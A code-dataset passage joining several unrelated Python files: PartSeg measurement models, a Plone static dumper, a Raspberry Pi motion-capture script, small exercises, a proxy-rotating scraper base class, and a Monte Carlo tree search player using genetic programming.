import MEASUREMENT_DICT\n\n new_dkt = dkt.copy()\n new_dkt[\"parameter_dict\"] = new_dkt.pop(\"dict\")\n new_dkt[\"name\"] = MEASUREMENT_DICT[new_dkt[\"name\"]].get_name()\n\n return new_dkt\n\n\n@register_class(\n version=\"0.0.2\",\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.Leaf\",\n \"PartSeg.utils.analysis.measurement_base.Leaf\",\n \"segmentation_analysis.statistics_calculation.Leaf\",\n ],\n migrations=[(\"0.0.1\", _migrate_leaf_dict), (\"0.0.2\", rename_key(\"parameter_dict\", \"parameters\"))],\n)\nclass Leaf(BaseModel):\n \"\"\"\n Class for describe calculation of basic measurement\n \"\"\"\n\n name: str\n parameters: Any = Field(default_factory=dict)\n power: float = 1.0\n area: Optional[AreaType] = None\n per_component: Optional[PerComponent] = None\n channel: Optional[Channel] = None\n\n @validator(\"parameters\")\n def _validate_parameters(cls, v, values): # pylint: disable=no-self-use\n if not isinstance(v, dict) or \"name\" not in values:\n return v\n from PartSegCore.analysis.measurement_calculation import MEASUREMENT_DICT\n\n if values[\"name\"] not in MEASUREMENT_DICT:\n return v\n\n method = MEASUREMENT_DICT[values[\"name\"]]\n if not method.__new_style__ or not method.__argument_class__.__fields__:\n return v\n\n v = REGISTER.migrate_data(class_to_str(method.__argument_class__), {}, v)\n return method.__argument_class__(**v)\n\n @validator(\"per_component\")\n def _validate_per_component(cls, v, values): # pylint: disable=no-self-use\n if not isinstance(v, PerComponent) or \"area\" not in values or values[\"area\"] is None:\n return v\n if v == PerComponent.Per_Mask_component and values[\"area\"] != AreaType.ROI:\n raise ValueError(\"Per_Mask_component can be used only with ROI area\")\n return v\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n \"\"\"\n Get set with number of channels needed for calculate this measurement\n\n :param measurement_dict: dict with all measurementh method.\n :return: set of channels num\n \"\"\"\n resp = set()\n if self.channel is not None and self.channel.value != -1:\n resp.add(self.channel)\n try:\n measurement_method = measurement_dict[self.name]\n if measurement_method.__new_style__:\n fields = base_model_to_algorithm_property(measurement_method.__argument_class__)\n else:\n fields = measurement_method.get_fields()\n for el in fields:\n if isinstance(el, str):\n continue\n if el.value_type is Channel:\n if isinstance(self.parameters, dict):\n if el.name in self.parameters:\n resp.add(Channel(self.parameters[el.name]))\n elif hasattr(self.parameters, el.name):\n resp.add(getattr(self.parameters, el.name))\n except KeyError as e:\n raise AlgorithmDescribeNotFound(self.name) from e\n return resp\n\n def _parameters_string(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n parameters = dict(self.parameters)\n if not parameters and self.channel is None:\n return \"\"\n arr = []\n if self.channel is not None and self.channel.value != -1:\n arr.append(f\"channel={self.channel}\")\n if self.name in measurement_dict:\n measurement_method = measurement_dict[self.name]\n fields_dict = measurement_method.get_fields_dict()\n arr.extend(f\"{fields_dict[k].user_name}={v}\" for k, v in parameters.items())\n else:\n arr.extend(f\"{k.replace('_', ' ')}={v}\" for k, v in parameters.items())\n return \"[\" + \", \".join(arr) + \"]\"\n\n def _plugin_info(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n if self.name not in measurement_dict:\n return \"\"\n measurement_method = measurement_dict[self.name]\n if (\n hasattr(measurement_method, \"__module__\")\n and measurement_method.__module__.split(\".\", 1)[0] != \"PartSegCore\"\n ):\n if getattr(sys, \"frozen\", False):\n return f\"[{measurement_method.__module__.split('.', 2)[1]}] \"\n return f\"[{measurement_method.__module__.split('.', 1)[0]}] \"\n return \"\"\n\n def pretty_print(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str:\n \"\"\"\n Pretty print for presentation in user interface.\n\n :param measurement_dict: dict with additional information used for more detailed description\n :return: string with indentation\n \"\"\"\n\n resp = self.name\n if self.area is not None:\n resp = f\"{self.area} {resp}\"\n resp = self._plugin_info(measurement_dict) + resp\n if self.per_component is not None:\n if self.per_component == PerComponent.Yes:\n resp += \" per component \"\n elif self.per_component == PerComponent.Per_Mask_component:\n resp += \" per mask component \"\n elif self.per_component == PerComponent.Mean:\n resp += \" mean component \"\n resp += self._parameters_string(measurement_dict)\n if self.power != 1.0:\n resp += f\" to the power {self.power}\"\n return resp\n\n def __str__(self): # pragma: no cover\n return self.pretty_print({})\n\n def get_unit(self, ndim: int) -> Symbol:\n \"\"\"\n Return unit of selected measurement reflecting dimensionality.\n\n :param ndim: data dimensionality\n \"\"\"\n from PartSegCore.analysis import MEASUREMENT_DICT\n\n method = MEASUREMENT_DICT[self.name]\n if self.power != 1:\n return method.get_units(ndim) ** self.power\n return method.get_units(ndim)\n\n def is_per_component(self) -> bool:\n \"\"\"If measurement return list of result or single value.\"\"\"\n return self.per_component in {PerComponent.Yes, PerComponent.Per_Mask_component}\n\n def need_mask(self) -> bool:\n \"\"\"If this measurement need mast for proper calculation.\"\"\"\n return (\n self.area in {AreaType.Mask, AreaType.Mask_without_ROI}\n or self.per_component is PerComponent.Per_Mask_component\n )\n\n\ndef replace(self, **kwargs) -> Leaf:\n for key in list(kwargs.keys()):\n if key == \"power\":\n continue\n if not hasattr(self, key):\n raise ValueError(f\"Unknown parameter {key}\")\n if getattr(self, key) is not None and (key != \"parameters\" or dict(self.parameters)):\n del kwargs[key]\n\n return self.copy(update=kwargs)\n\n\nLeaf.replace_ = replace\n\nNode = ForwardRef(\"Node\")\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.Node\",\n \"PartSeg.utils.analysis.measurement_base.Node\",\n \"segmentation_analysis.statistics_calculation.Node\",\n ]\n)\nclass Node(BaseModel):\n \"\"\"\n Class for describe operation between two measurements\n \"\"\"\n\n left: Union[Node, Leaf]\n op: str = Field(\n description=\"Operation to perform between left and right child. Currently only division (`/`) supported\"\n )\n right: Union[Node, Leaf]\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n return self.left.get_channel_num(measurement_dict) | self.right.get_channel_num(measurement_dict)\n\n def __str__(self): # pragma: no cover\n left_text = f\"({self.left!s})\" if isinstance(self.left, Node) else str(self.left)\n\n right_text = f\"({self.right!s})\" if isinstance(self.right, Node) else str(self.right)\n\n return left_text + self.op + right_text\n\n def pretty_print(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> str: # pragma: no cover\n left_text = (\n f\"({self.left.pretty_print(measurement_dict)})\"\n if isinstance(self.left, Node)\n else self.left.pretty_print(measurement_dict)\n )\n\n right_text = (\n f\"({self.right.pretty_print(measurement_dict)})\"\n if isinstance(self.right, Node)\n else self.right.pretty_print(measurement_dict)\n )\n\n return left_text + self.op + right_text\n\n def get_unit(self, ndim) -> Symbol:\n if self.op == \"/\":\n return self.left.get_unit(ndim) / self.right.get_unit(ndim)\n raise ValueError(f\"Unknown operator '{self.op}'\")\n\n def is_per_component(self) -> bool:\n return self.left.is_per_component() or self.right.is_per_component()\n\n def need_mask(self):\n return self.left.need_mask() or self.right.need_mask()\n\n\nNode.update_forward_refs()\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.StatisticEntry\",\n \"PartSeg.utils.analysis.measurement_base.StatisticEntry\",\n \"segmentation_analysis.statistics_calculation.StatisticEntry\",\n ]\n)\nclass MeasurementEntry(BaseModel):\n \"\"\"Describe single measurement in measurement set\"\"\"\n\n name: str\n calculation_tree: Union[Node, Leaf]\n\n def get_unit(self, unit: Units, ndim) -> str:\n return str(self.calculation_tree.get_unit(ndim)).format(str(unit))\n\n def get_channel_num(self, measurement_dict: Dict[str, \"MeasurementMethodBase\"]) -> Set[Channel]:\n return self.calculation_tree.get_channel_num(measurement_dict)\n\n\nclass MeasurementMethodBase(AlgorithmDescribeBase, ABC):\n \"\"\"\n This is base class For all measurement calculation classes\n based on text_info[0] the measurement name wil be generated, based_on text_info[1] the description is generated\n \"\"\"\n\n __argument_class__ = BaseModel\n\n text_info = \"\", \"\"\n\n need_class_method: ClassVar[List[str]] = [\n \"get_description\",\n \"is_component\",\n \"calculate_property\",\n \"get_starting_leaf\",\n \"get_units\",\n \"need_channel\",\n ]\n\n @classmethod\n def get_name(cls) -> str:\n \"\"\"Name of measurement\"\"\"\n return str(cls.get_starting_leaf().name)\n\n @classmethod\n def get_description(cls) -> str:\n \"\"\"Measurement long description\"\"\"\n return \"\" if isinstance(cls.text_info, str) else cls.text_info[1]\n\n @classmethod\n def is_component(cls) -> bool:\n \"\"\"Return information if Need information about components\"\"\"\n return False\n\n @staticmethod\n def calculate_property(\n # image: Image,\n channel: np.ndarray,\n roi: np.ndarray,\n mask: np.ndarray,\n voxel_size: Spacing,\n result_scalar: float,\n roi_alternative: Dict[str, np.ndarray],\n roi_annotation: Dict[int, Any],\n **kwargs,\n ):\n \"\"\"\n Main function for calculating measurement\n\n :param channel: main channel selected for measurement\n :param channel_{i}: for channel requested using :py:meth:`get_fields`\n ``AlgorithmProperty(\"channel\", \"Channel\", 0, value_type=Channel)``\n :param area_array: array representing current area returned by :py:meth:`area_type`\n :param roi: array representing roi\n :param mask: array representing mask (upper level roi)\n :param voxel_size: size of single voxel in meters\n :param result_scalar: scalar to get proper units in result\n :param roi_alternative: dict with alternative roi representation (for plugin specific mapping)\n :param roi_annotation: dict with roi annotations (for plugin specific mapping)\n\n List incomplete.\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_starting_leaf(cls) -> Leaf:\n \"\"\"This leaf is put on default list\"\"\"\n return Leaf(name=cls._display_name())\n\n @classmethod\n def _display_name(cls):\n return cls.text_info if isinstance(cls.text_info, str) else cls.text_info[0]\n\n @classmethod\n def get_units(cls, ndim) -> symbols:\n \"\"\"Return units for measurement. They are shown to user\"\"\"\n raise NotImplementedError\n\n @classmethod\n def need_channel(cls):\n \"\"\"if need image data\"\"\"\n return False\n\n @staticmethod\n def area_type(area: AreaType):\n \"\"\"Map chosen area type to proper area type. Allow to correct Area type.\"\"\"\n return area\n\n @staticmethod\n def need_full_data():\n return False\n","sub_path":"package/PartSegCore/analysis/measurement_base.py","file_name":"measurement_base.py","file_ext":"py","file_size_in_byte":14707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536303137","text":"import os\nimport simplejson as json\n\nfrom zope.component import queryMultiAdapter\nfrom zope.interface import classProvides, implements\n\nfrom collective.transmogrifier.interfaces import ISection, ISectionBlueprint\n\nfrom oops.staticdump.utilities import renew_folder\nfrom oops.staticdump.interfaces import IDumper\n\n\ndef destination(transmogrifier):\n return transmogrifier['transmogrifier'].get('destination', '/tmp/dump')\n\nclass TreeBuilderSection(object):\n \"\"\" Create a tree on file system equivalent to plone site.\n Filter out not specified content types\n \"\"\"\n\n classProvides(ISectionBlueprint)\n implements(ISection)\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n\n self.destination = destination(transmogrifier)\n renew_folder(self.destination)\n\n types = options.get('types', [])\n self.types = [t for t in types.splitlines() if t!='']\n\n def __iter__(self):\n for item in self.previous:\n if item.get('_type', '') in self.types:\n path = item.get('_path')\n final_destination = os.path.join(self.destination, path)\n renew_folder(final_destination)\n\n yield item\n\n\nclass DumperSection(object):\n \"\"\" For each entry call IDumper adapter \"\"\"\n\n classProvides(ISectionBlueprint)\n implements(ISection)\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n self.transmogrifier = transmogrifier\n self.transmogrifier.manifests = {}\n self.transmogrifier.folders = []\n self.transmogrifier.others = []\n self.transmogrifier.voices = []\n self.transmogrifier.files = []\n self.transmogrifier.anchored_pages = []\n self.portal = transmogrifier.context\n\n types = self.transmogrifier['treebuilder'].get('types', [])\n self.types = [t for t in types.splitlines() if t!='']\n\n\n def manifests(self):\n \"\"\" save the manifests file \"\"\"\n file_path = self.transmogrifier['transmogrifier'].get('destination', '/tmp/dump')\n f = open(os.path.join(file_path, 'manifest-versions.json'), 'w')\n f.write(json.dumps(self.transmogrifier.manifests)) # to check format\n f.close()\n\n def __iter__(self):\n for item in self.previous:\n #if item.get('_type', '') in self.types:\n path = item.get('_path')\n obj = self.portal.restrictedTraverse(path)\n dumper = queryMultiAdapter((obj, self.transmogrifier), IDumper)\n if dumper is not None:\n dumper.dump()\n\n yield item\n self.manifests()\n","sub_path":"packages/oops.staticdump/branches/book-dumpers-removal-r215/oops/staticdump/sections.py","file_name":"sections.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"419282862","text":"\nimport picamOriginal\nimport picamera\nimport sendNotification2\nimport glob\nimport os\nfrom datetime import datetime\n\nmotState = False\npath = '/home/pi/Desktop/cookie/images/'\n\ndef captureImage(currentTime,picPath):\n picName = currentTime.strftime('%Y. %m. %d-%H%M%S')+'.jpg'\n with picamera.PiCamera() as camera:\n camera.resolution = (1280,720)\n camera.capture(picPath+picName)\n print('Taken pic')\n\ndef getTime():\n currentTime=datetime.now()\n return currentTime\n\npicNumber=0\n\nfiles = glob.glob('/home/pi/Desktop/cookie/images/*')\n\nfor f in files:\n os.remove(f)\n\nwhile True:\n motState = picamOriginal.mtion()\n print(motState)\n if motState:\n currentTime = getTime()\n captureImage(currentTime,path)\n picNumber+=1\n if (picNumber == 5):\n sendNotification2.sendEmail()\n picNumber=0\n","sub_path":"useMotion.py","file_name":"useMotion.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"211553950","text":"def pronksikarva_summa(taisarvud):\n ''' (list) -> int\n Tagastab järjendis olevate arvude 1, 2 ja 5 summa.\n >>> pronksikarva_summa([1, 20, 20, 5, 50, 2, 2, 1])\n 11\n '''\n summa = 0\n \n for mynt in taisarvud:\n if mynt == 1 or mynt == 2 or mynt == 5:\n summa = summa + mynt\n return summa\n\nfailinimi = input('Sisesta failinimi: ')\n\nfail = open(failinimi, encoding=\"UTF-8\")\ntaisarvud = []\n \nfor rida in fail:\n taisarvud.append(int(rida)) \nfail.close()\n\nprint(pronksikarva_summa(taisarvud))","sub_path":"yl6.4b.py","file_name":"yl6.4b.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"249988040","text":"import json\n\n\ndef JsonParser(file):\n pdata = dict()\n with open(file, mode=\"r\", encoding=\"utf-8\") as inf:\n pdata = json.load(inf)\n return pdata\n\n\ndef test():\n test_data = JsonParser(\"jsonData.json\")\n pdit = {}\n for pd in test_data:\n print(pd[\"batters\"][\"batter\"])\n for item in pd[\"batters\"][\"batter\"]:\n print(item[\"id\"])\n\nif __name__ == '__main__':\n test()\n","sub_path":"Basics/jsonProcess.py","file_name":"jsonProcess.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"392585349","text":"import requests\nimport threading\nimport time\nimport traceback\nimport re,os\n\n'''\n基类爬虫:\n1、IP池的更新和调用\n2、初始化配置\n'''\nclass spiderbase:\n _DIRS = ['data','conf','bin','lib','log']\n def __init__(self):\n for dir in self._DIRS:\n if not os.path.exists(f'./{dir}'):\n os.makedirs(f'/.{dir}')\n #代理url\n self.proxy_url = ''\n # 代理提取间隔限制\n self.time_line = time.time()\n self.time_limit = 1\n # self.timeLimitLock = threading.Lock()\n self.ip_pool = []\n self.ipPoolLock = threading.Lock()\n self.ipPoolUpdateLock = threading.Lock()\n self.headers={\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36'\n }\n self.userAgentPool = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36']\n self.import_setting()\n '''\n 获取代理IP列表\n 以['IP:port']列表返回\n 需要根据不同代理商的API返回结果进行重写\n '''\n @staticmethod\n def getProxyList(proxy_url) -> list:\n try:\n html = requests.get(url=proxy_url)\n data = html.json()\n except:\n traceback.print_exc()\n return []\n return data\n\n '''导入配置文件'''\n def import_setting(self) -> bool:\n try:\n set = open('./conf/init.setting','r')\n except:\n print('未找到初始化配置文件./conf/init.setting.将使用默认参数.')\n return False\n HD = re.compile('([\\s\\S]+?)')\n UA = re.compile('([\\s\\S]+?)')\n PURL = re.compile('([\\s\\S]+?)')\n setting_text = set.read()\n header_text = HD.search(setting_text).group(1).strip(' \\n')\n userAgentText = UA.search(setting_text).group(1).strip(' \\n')\n proxyUrlText = PURL.search(setting_text).group(1).strip(' \\n')\n if header_text:\n header_list = header_text.split('\\n')\n for header in header_list:\n htmp = header.strip(' \\n')\n if htmp and ':' in htmp:\n htmp_list = htmp.split(':')\n header_name = htmp_list[0].strip(' ')\n header_value = htmp_list[1].strip(' ')\n self.headers[header_name]=header_value\n if userAgentText:\n userAgentList = userAgentText.split('\\n')\n for user_agent in userAgentList:\n utmp = user_agent.strip(' \\n')\n if utmp not in self.userAgentPool:\n self.userAgentPool.append(utmp)\n if proxyUrlText:\n self.proxy_url = proxyUrlText\n\n return True\n\n\n def ipPoolUpdatePermit(self) -> bool:\n while(time.time()-self.time_line bool:\n self.ipPoolUpdatePermit()\n ipPortList = self.getProxyList(self.proxy_url)\n if not ipPortList:\n return False\n else:\n self.ipPoolLock.acquire()\n for ip_port in ipPortList:\n self.ip_pool.append(ip_port)\n self.ipPoolLock.release()\n return True\n\n\n '''从代理池中取出IP:port'''\n def getIpPort(self) -> str:\n self.ipPoolUpdateLock.acquire()\n if not self.ip_pool:\n if_update = self.ipPoolUpdate()\n if not if_update:\n print('IP获取失败,IP池更新错误')\n self.ipPoolUpdateLock.release()\n return ''\n self.ipPoolLock.acquire()\n ip_port = self.ip_pool.pop()\n self.ipPoolLock.release()\n else:\n self.ipPoolLock.acquire()\n ip_port = self.ip_pool.pop()\n self.ipPoolLock.release()\n self.ipPoolUpdateLock.release()\n return ip_port\n\n '''获取代理链接,类型参数为http/https,默认https'''\n def getProxyUrl(self,type='https') -> str:\n ip_port = self.getIpPort()\n return f'{type}://{ip_port}'\n\nif __name__ =='__main__':\n spider = spiderbase()","sub_path":"spiderbase.py","file_name":"spiderbase.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"322623660","text":"from Player import Player\r\n\r\nimport operator\r\nfrom operator import attrgetter\r\nimport numpy as np\r\nimport time\r\nimport random\r\nfrom statistics import mean\r\nimport math\r\n\r\nfrom deap import algorithms\r\nfrom deap import base\r\nfrom deap import creator\r\nfrom deap import tools\r\nfrom deap import gp\r\n\r\n\r\n\r\nclass MCTS_TREE_ES_Player(Player):\r\n \r\n # Player 1 selects the optimal UCT move \r\n # Player 2 selects the worst move from Player 1's position\r\n \r\n def __init__(self, iterations = 500, timeLimit = 3, isTimeLimited = False, c_param = 9, logs=False):\r\n super().__init__()\r\n self.iterations = iterations\r\n self.timeLimit = timeLimit\r\n self.isTimeLimited = isTimeLimited\r\n self.c_param = c_param\r\n self.name = 'T_ES_MCTS'\r\n self.fullName = f'MCTS (Time Limit = {self.timeLimit})' if self.isTimeLimited else f'MCTS (Iterations = {self.iterations})'\r\n self.family = \"MCTS\"\r\n self.logs = logs\r\n self.hasGPTree = False\r\n self.GPTree = None\r\n if self.logs:\r\n self.cols = ['Name','Simulations','Turn','TimeTaken']\r\n self.file = self.CreateFile()\r\n \r\n \r\n def ClonePlayer(self):\r\n Clone = MCTS_TREE_ES_Player(iterations=self.iterations, timeLimit=self.timeLimit, isTimeLimited = self.isTimeLimited, \r\n c_param=self.c_param, logs=self.logs)\r\n return Clone\r\n \r\n \r\n def chooseAction(self, state):\r\n \"\"\"\r\n Choose actions using UCT function\r\n \"\"\"\r\n return self.MCTS_Search(state, self.iterations, self.timeLimit, self.isTimeLimited)\r\n \r\n \r\n def MCTS_Search(self, root_state, iterations, timeLimit, isTimeLimited):\r\n \"\"\"\r\n Conduct a UCT search for itermax iterations starting from rootstate.\r\n Return the best move from the rootstate.\r\n Assumes 2 alternating players (player 1 starts), with games results in the range [0, 1]\r\n \"\"\"\r\n # Player 1 = 1, Player 2 = 2 (Player 2 wants to the game to be a loss)\r\n playerSymbol = root_state.playerSymbol\r\n \r\n # state the Root Node\r\n root_node = Node(state = root_state)\r\n #startTime = time.time()\r\n \r\n if self.isTimeLimited:\r\n self.MCTS_TimeLimit(root_node, root_state)\r\n else:\r\n self.MCTS_IterationLimit(root_node, root_state)\r\n \r\n # return the node with the highest number of wins from the view of the current player\r\n if playerSymbol == 1:\r\n bestMove = sorted(root_node.child, key = lambda c: c.Q)[-1].Move\r\n else:\r\n bestMove = sorted(root_node.child, key = lambda c: c.Q)[0].Move\r\n \r\n \r\n return bestMove.move\r\n \r\n \r\n \r\n def MCTS_IterationLimit(self, root_node, root_state):\r\n \r\n startTime = time.time()\r\n \r\n for i in range(self.iterations):\r\n \r\n node = root_node\r\n state = root_state.CloneState()\r\n \r\n # Select\r\n while node.untried_moves == [] and node.child != []: # node is fully expanded\r\n if not self.hasGPTree:\r\n # GP search\r\n if root_state.Turn >= 1:\r\n # get the GPTree of this turn\r\n self.GPTree = GP_Search(node, self.c_param, self.hasGPTree, self.GPTree)\r\n self.hasGPTree = True\r\n node = node.Search(self.c_param, self.hasGPTree, self.GPTree)\r\n state.move(node.Move.move)\r\n \r\n # Expand\r\n if node.untried_moves != [] and (not state.isGameOver): # if we can expand, i.e. state/node is non-terminal\r\n move_random = random.choice(node.untried_moves)\r\n state.move(move_random.move)\r\n node = node.AddChild(move = move_random, state = state, isGameOver = state.isGameOver)\r\n \r\n # Rollout\r\n # play random moves until the game reaches a terminal state\r\n # shuffle deck\r\n state.shuffle()\r\n while not state.isGameOver:\r\n m = state.getRandomMove()\r\n state.move(m.move)\r\n \r\n # Backpropogate\r\n result = state.checkWinner()\r\n while node != None: # backpropogate from the expected node and work back until reaches root_node\r\n node.UpdateNode(result, self.c_param)\r\n node = node.parent\r\n # latest time\r\n endTime = time.time()\r\n \r\n print(f'(MCTS_TREE_ES) TimeTaken: {round(endTime - startTime,3)} secs, Time:{time.strftime(\"%H:%M:%S\", time.localtime())}')\r\n \r\n # reset GP info\r\n self.GPTree = None\r\n self.hasGPTree = False\r\n \r\n # append info to csv\r\n if self.logs:\r\n data = {'Name': self.name,'Simulations':self.iterations,'Turn':int((root_state.Turn+1)/2), 'TimeTaken':endTime - startTime}\r\n self.UpdateFile(data)\r\n \r\n \r\n \r\n \r\n \r\n##############################################################################\r\n##############################################################################\r\n##############################################################################\r\n\r\n\r\n#C_PARAM = 2\r\n\r\nclass Node:\r\n \"\"\"\r\n The Search Tree is built of Nodes\r\n A node in the search tree\r\n \"\"\"\r\n \r\n def __init__(self, Move = None, parent = None, state = None, isGameOver = False):\r\n self.Move = Move # the move that got us to this node - \"None\" for the root\r\n self.parent = parent # parent node of this node - \"None\" for the root node\r\n self.child = [] # list of child nodes\r\n self.state = state\r\n self.untried_moves = state.availableMoves()\r\n self.playerSymbol = state.playerSymbol\r\n # keep track of visits/wins/losses\r\n self.visits = 0\r\n self.wins = 0\r\n self.losses = 0\r\n self.draws = 0\r\n self.Q = 0\r\n # UCT score\r\n self.UCT_high = 0\r\n self.UCT_low = 0\r\n # GP search decision\r\n self.GP_Tree = None\r\n \r\n \r\n def __repr__(self):\r\n visits = 1 if self.visits == 0 else self.visits\r\n String = \"[\"\r\n String += f'Move:{str(self.Move.move)}, Wins:{round(self.wins,1)},'\r\n String += f' Losses:{self.losses}, Draws:{self.draws}, Q:{round(self.Q,3)},'\r\n String += f' Wins/Visits:{round(self.wins,1)}/{self.visits} ({round(self.wins/visits,3)}),'\r\n String += f' UCT_high:{round(self.UCT_high, 3)}, UCT_low:{round(self.UCT_low, 3)},'\r\n String += f' Remaining Moves:{len(self.untried_moves)}'\r\n String += \"]\"\r\n \r\n return String\r\n \r\n def AddChild(self, move, state, isGameOver):\r\n \"\"\"\r\n Add new child node for this move remove m from list of untried_moves.\r\n Return the added child node.\r\n \"\"\"\r\n node = Node(Move = move, state = state, isGameOver = isGameOver, parent = self)\r\n self.untried_moves.remove(move) # this move is now not available\r\n self.child.append(node)\r\n return node\r\n \r\n \r\n def UpdateNode(self, result, c_param):\r\n \"\"\"\r\n Update result and number of visits of node\r\n \"\"\"\r\n self.visits += 1\r\n self.wins += (result > 0)\r\n self.losses += (result < 0)\r\n self.draws += (result == 0)\r\n self.Q = self.Q + (result - self.Q)/self.visits\r\n \r\n \r\n def SwitchNode(self, move, state):\r\n \"\"\"\r\n Switch node to new state\r\n \"\"\"\r\n # if node has children\r\n for i in self.child:\r\n if i.Move == move:\r\n return i\r\n \r\n # if node has no children\r\n return self.AddChild(move, state)\r\n \r\n \r\n def Search(self, c_param, hasGPTree, GPTree):\r\n \"\"\"\r\n For the first half of the game use the UCB1 formula.\r\n Else, use GP to find an alternative to UCT \r\n \"\"\"\r\n # select the child chosen from the GP tree\r\n if hasGPTree:\r\n return GP_Search(self, c_param, hasGPTree, GPTree)\r\n # else, use normal UCT\r\n else:\r\n if self.playerSymbol == 1:\r\n # look for maximum output\r\n choice_weights = [c.Q + np.sqrt(c_param * np.log(self.visits) / c.visits) for c in self.child]\r\n return self.child[np.argmax(choice_weights)]\r\n else: \r\n # look for minimum output\r\n choice_weights = [c.Q - np.sqrt(c_param * np.log(self.visits) / c.visits) for c in self.child]\r\n return self.child[np.argmin(choice_weights)]\r\n\r\n\r\n\r\n \r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n############################################################################################################################################################################################################################\r\n\r\n\r\n\r\n\r\n\r\ndef GP_Search(RootNode, c_param, hasGPTree=False, GPTree=None):\r\n \"\"\"\r\n Find the best child from the given node\r\n \"\"\"\r\n \r\n state = RootNode.state # current game state\r\n \r\n # set the number of inputs - [Q,n,N,c]\r\n pset = gp.PrimitiveSet(\"MAIN\", 4)\r\n \r\n # Define new functions\r\n def div(left, right):\r\n if (abs(right) < 0.001):\r\n return 1\r\n else:\r\n return left/right\r\n \r\n # natural log\r\n def ln(left): \r\n if left == 1: left = 1.001\r\n if left < 0.01: left = 0.01\r\n return np.log(abs(left))\r\n \r\n # square root\r\n def root(left):\r\n return (abs(left))**(1/2)\r\n\r\n # add operators\r\n pset.addPrimitive(operator.add, 2)\r\n pset.addPrimitive(operator.sub, 2)\r\n pset.addPrimitive(operator.mul, 2)\r\n pset.addPrimitive(div, 2)\r\n pset.addPrimitive(operator.neg, 1)\r\n pset.addPrimitive(ln, 1)\r\n pset.addPrimitive(root, 1)\r\n\r\n # rename the arguments\r\n pset.renameArguments(ARG0='Q')\r\n pset.renameArguments(ARG1='n')\r\n pset.renameArguments(ARG2='N')\r\n pset.renameArguments(ARG3='c')\r\n \r\n # primitives and terminals list\r\n prims = pset.primitives[object]\r\n terminals = pset.terminals[object]\r\n \r\n # want to maximise the solution\r\n creator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\r\n # define the structure and the \r\n creator.create(\"Individual\", gp.PrimitiveTree, fitness=creator.FitnessMax) \r\n \r\n # register the generation functions into a Toolbox\r\n toolbox = base.Toolbox()\r\n toolbox.register(\"expr\", gp.genHalfAndHalf, pset=pset, min_=1, max_=5)\r\n toolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.expr)\r\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\r\n toolbox.register(\"compile\", gp.compile, pset=pset)\r\n\r\n\r\n def evalTree(individual, RootNode, state):\r\n # Transform the tree expression in a callable function\r\n func = toolbox.compile(expr=individual)\r\n isPlayer1 = (state.playerSymbol == 1)\r\n\r\n \r\n # from this point simulate the game 10 times appending the results\r\n SIMULATIONS = 10\r\n results = []\r\n for i in range(SIMULATIONS):\r\n # copy the state\r\n stateCopy = state.CloneState()\r\n node = RootNode\r\n \r\n # child nodes\r\n childNodes = node.child\r\n nodeValues = [[c.Q, c.visits, node.visits, c_param] for c in childNodes] # values of the nodes\r\n \r\n # get the values of the tree for each child node\r\n v = [func(Q,n,N,c) for Q,n,N,c in nodeValues]\r\n node = childNodes[np.argmax(v)] if isPlayer1 else childNodes[np.argmin(v)]\r\n \r\n # play the move of this child node\r\n stateCopy.move(node.Move.move)\r\n\r\n # shuffle deck\r\n stateCopy.shuffle()\r\n \r\n # random rollout\r\n while not stateCopy.isGameOver:\r\n m = stateCopy.getRandomMove()\r\n stateCopy.move(m.move)\r\n \r\n # result\r\n result = stateCopy.checkWinner()\r\n results.append(result)\r\n \r\n #Backpropogate\r\n while node != None: # backpropogate from the expected node and work back until reaches root_node\r\n node.UpdateNode(result,0)\r\n node = node.parent\r\n \r\n # semantics check \r\n individual.vector = results\r\n \r\n fitness = np.mean(results)\r\n # switch results for second player\r\n fitness = -fitness if (not isPlayer1) else fitness\r\n \r\n return fitness,\r\n \r\n\r\n \r\n # register gp functions\r\n toolbox.register(\"evaluate\", evalTree, RootNode=RootNode, state=state)\r\n toolbox.register(\"select\", selBestCustom)\r\n toolbox.register(\"mate\", gp.cxOnePoint)\r\n toolbox.register(\"expr_mut\", gp.genFull, min_=0, max_=3)\r\n toolbox.register(\"mutate\", gp.mutUniform, expr=toolbox.expr_mut, pset=pset)\r\n \r\n toolbox.decorate(\"mate\", gp.staticLimit(key=operator.attrgetter(\"height\"), max_value=8))\r\n toolbox.decorate(\"mutate\", gp.staticLimit(key=operator.attrgetter(\"height\"), max_value=5))\r\n \r\n # create tree for UCT\r\n UCT_formula = [ prims[0], terminals[0], 